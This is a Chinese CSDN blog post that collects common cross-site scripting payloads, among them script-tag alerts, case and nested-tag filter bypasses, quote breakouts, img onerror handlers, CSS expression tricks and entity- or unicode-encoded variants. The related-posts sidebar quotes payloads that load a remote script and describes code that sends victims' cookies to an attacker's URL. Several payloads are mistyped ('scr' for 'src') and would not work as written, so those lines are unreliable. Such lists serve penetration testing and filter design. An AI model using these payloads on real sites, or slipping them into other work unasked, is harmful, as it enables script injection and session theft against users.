xss-收集常用的代码

最新推荐文章于 2024-06-11 14:40:18 发布
最新推荐文章于 2024-06-11 14:40:18 发布
阅读量863 收藏 4
点赞数 1
分类专栏: # XSS跨站脚本 文章标签: xss javascript xss漏洞 xss注入代码 xss常用代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/125978568
版权

最长用的肯定是:

<script>alert("xss")</script>

DOM型一般用

<a href='#' onclick="alert(1111)">Click to see?</a>

大小写绕过

'"><sCrIpT>alert(63252)</sCrIpT>

过滤script绕过

<scr<script>ipt>alert("XXSSSS")</scr</script>ipt>

htmlentities()没有过滤单引号,直接用单引号绕过

';alert('xss');'

构造js绕过

</script><script>alert('xss')</script>

收集的其它代码

<img scr=javascript:alert("xss")></img>

http://www.example.com/MyApp.aspx?myvar= "></XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<IFRAME SRC=javascript:alert('test')></IFRAME>

" οnclick="alert(1)"

<img scr="javascrip&#116&#58 alert(/xss/)></img>

(?用tab键弄出来的空格)
<img scr="javas????cript:alert(/xss/)" width=150></img> 

<img scr="#" onerror=alert(/xss/)></img>

<img scr="#" style="xss:expression(alert(/xss/));"></img>

(/**/ 表示注释)
<img scr="#"/* */onerror=alert(/xss/) width=150></img> 

<img src=vbscript:msgbox ("xss")></img>

<style> input {left:expression (alert('xss'))}</style>

<div style={left:expression (alert('xss'))}></div>

<div style={left:exp/* */ression (alert('xss'))}></div>

<div style={left:\0065\0078ression (alert('xss'))}></div>

html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>

unicode <div style="{left:expRessioN (alert('xss'))}">

收集中不定时更新……

常家壮
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
安装xss-labs ppt手册
10-22
2. **准备Payload库**:XSS攻击往往需要注入特定的代码片段,这些被称为Payloads。你可以收集一些常见的Payload,如JavaScript函数调用、事件触发等,并理解它们的工作机制。 3. **参考Write-up**:Write-up是别人...
XSS 攻击常用代码
高压锅博客
12-22 7224
代码XSS 攻击常用代码
xss代码
Sylon的博客
10-09 3770
</script>"><script>prompt(1)</script> </ScRiPt>"><ScRiPt>prompt(1)</ScRiPt> "><img src=x onerror=prompt(1)> "><svg/onload=prompt(1)> ">&l...
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)_xss绕过
最新发布
weixin_42340783的博客
06-11 1346
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
一些经典的XSS跨站代码整理
主题模板站的博客
01-31 563
base64,>>有趣的isindex 興味深いhttp://jsbin.com/inekab for Opera only。IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
xss跨站脚本***大全
weixin_34331102的博客
03-20 451
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
第四节 隐藏提交参数中的XSS-01
09-15
隐藏域的代码格式为:,其中name是隐藏域的名称,value是隐藏域的值。 Burpsutie 抓包测试 --------------------- Burpsutie是Web应用程序安全测试工具,可以用来抓包和分析HTTP请求。在本节课程中,我们使用...
第五节 限制输入长度的XSS-01
09-15
XSS(Cross-Site Scripting)攻击是一种常见的 Web 应用程序攻击,攻击者可以 inject 恶意代码到 Web 应用程序中,从而盗窃用户信息或控制用户行为。限制输入长度是防止 XSS 攻击的一种重要措施。 HTML 表单文本框...
第三节 选择列表中的XSS-01
09-15
**XSS(跨站脚本攻击)**是网络安全领域中的一种常见漏洞,它允许攻击者在用户的浏览器上执行恶意脚本。在“第三节 选择列表中的XSS-01”中,我们将深入探讨如何利用HTML的`<select>`标签、表单、以及Burpsuite工具...
KNR-XSS-Payloads:XSS的有效负载
05-05
"KNR-XSS-Payloads"是一个专门收集和整理XSS有效载荷的资源库,为安全研究人员和开发人员提供了一个测试和了解XSS漏洞的工具。 XSS攻击可以分为三种主要类型:存储型、反射型和DOM型。每种类型的XSS都有其特定的...
XSS的攻击及防御代码的简单演示
04-25
这个是XSS的攻击及防御代码的简单演示,利用Node搭建的
简单的XSS
Feng_Blue_的博客
10-08 251
通过hackbar传参<script><script>alert(/xss/);</script>;</script>,发现页面只显示了alert(/xss/);,可能存在标签过滤,验证 发现并无过滤,猜测可能是只过滤了<script>标签,尝试大写 在修改其中的一个字母后,提交,成功触发。 看一下源代码 可以发现,在get接收到参数以后,进行了替换,将<script></script>替换成为...
XSS攻击常识及常见的XSS攻击脚本汇总
热门推荐
qw_xingzhe的专栏
06-16 7万+
一、什么是XSS?XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。二、XSS有什么危害?当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。关于XSS有关危害,我这里中罗列...
XSS知识总结
weixin_64051447的博客
04-26 1698
HTML标签 等带src属性的标签都可以跨域加载资源,而不受同源策略的限制。每次加载时都会由浏览器发送一次GET请求,通过src属性加载的资源,浏览器会限制JavaScript的权限,使其不能读写返回的内容。
常见的XSS代码分析
weixin_33720452的博客
02-25 121
常见的XSS代码分析 1.闭合“<”,“>” 1)***者可以构建如下语句来闭合HTML标记,构造出完整无错的脚步语句 ><script>alert('XSS');</script>< 2)在提交上面代码闭合HTML代码后,出现如下的...
XSS专题
ZY95001的博客
09-11 1037
一、介绍 XSS(Cross-site Scripting,跨站脚本攻击),Owasp Top 10 2017中排名第7。主要基于JS完成恶意攻击行为。 原因:通过将精心构造的代码注入网页中,并由浏览器运行这段代码,达到攻击效果。XSS攻击的对象是用户和用户的浏览器(前端攻击)。 主要原因是没有对攻击者的输入进行严格的过滤,微博、留言板、聊天室等收集用户信息的地方都有可能被注入XSS代码。该漏洞存在于服务器中,但是执行环境在客户端浏览器,属于被动攻击。 主要危害:盗取用户账号;窃取cookie..
XSS跨站漏洞(Cross-site scripting):
sinat_21509375的专栏
01-24 1389
ØXSS跨站漏洞(Cross-site scripting): 跨站点脚本攻击(XSS/CSS)安全缺陷,往往存在于那些提供动态网页的Web应用系统中。这类Web站点提供动态的页面,这类页面由为用户动态建造的多个源站点的信息组成。如果应用系统存在该漏洞,则攻击者可以将恶意内容(一般为代码)插入到Web站点提供动态的页面中,以收集其他用户在使用被攻击页时提交的重要信息,或简单的在其它用户的浏览器上
xss绕过,payload全集
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
xss盗取cookie
07-28
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在网页中插入恶意脚本来获取用户的敏感信息,如cookie。根据引用内容,可以看出这是一个关于XSS攻击的示例代码和描述。 引用\[1\]是一个PHP代码片段,它将通过GET请求获取的cookie信息写入到一个名为cookie.txt的文件中。 引用\[2\]是一个JavaScript代码片段,它将用户的cookie信息发送到一个指定的URL,以便攻击者可以收集这些信息。 引用\[3\]描述了一个XSS攻击的实例,其中恶意脚本被插入到URL中,当用户访问该URL时,恶意脚本将被执行,导致用户的cookie信息被显示出来。 要防止XSS攻击,开发人员应该对用户输入进行严格的过滤和转义,以确保恶意脚本无法被执行。用户也应该保持浏览器和操作系统的更新,并避免点击可疑的链接或下载未知来源的文件,以减少受到XSS攻击的风险。 #### 引用[.reference_title] - *1* *2* [xss盗取cookie原理剖析](https://blog.csdn.net/weixin_51692662/article/details/127407078)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [网络安全实验6 认识XSS & 盗取cookie](https://blog.csdn.net/qq_37672864/article/details/104119221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值